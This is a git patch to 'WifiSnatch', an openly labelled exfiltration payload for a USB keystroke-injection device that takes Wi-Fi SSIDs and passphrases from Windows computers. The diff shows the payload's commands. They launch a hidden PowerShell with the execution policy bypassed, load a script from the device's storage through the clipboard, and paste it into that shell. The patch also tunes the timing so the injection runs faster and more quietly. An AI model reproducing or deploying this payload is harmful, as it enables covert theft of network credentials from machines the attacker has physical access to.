From 1eb60b48e73e13ae49ac9346104db31d94d3a2a2 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 2 Feb 2022 09:23:59 +0100 Subject: [PATCH] Updated WifiSnatch Fixed multiple mistakes --- .../exfiltration/WifiSnatch/payload.txt | 21 ++++++++++--------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/WifiSnatch/payload.txt b/payloads/library/exfiltration/WifiSnatch/payload.txt index 31c958af..45aa88ce 100644 --- a/payloads/library/exfiltration/WifiSnatch/payload.txt +++ b/payloads/library/exfiltration/WifiSnatch/payload.txt @@ -3,7 +3,7 @@ # Title: WifiSnatch # Description: Extract wifi information, such as passphrases & SSIDs # Author: 0iphor13 -# Version: 1.0 +# Version: 1.1 # Category: Exfiltration # Attackmodes: HID, Storage @@ -20,18 +20,19 @@ ATTACKMODE HID STORAGE LED STAGE1 -DELAY 5000 +Q DELAY 1500 RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 5000 +Q DELAY 500 +Q ENTER Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))" -DELAY 10000 +Q DELAY 2000 Q ENTER -DELAY 10000 +Q DELAY 1000 Q CONTROL v -DELAY 10000 +Q DELAY 1000 Q ENTER -DELAY 1000 +Q DELAY 1000 LED STAGE2 @@ -44,12 +45,12 @@ LED CLEANUP rm /root/udisk/DONE -DELAY 100 +Q DELAY 100 sync -DELAY 100 +Q DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT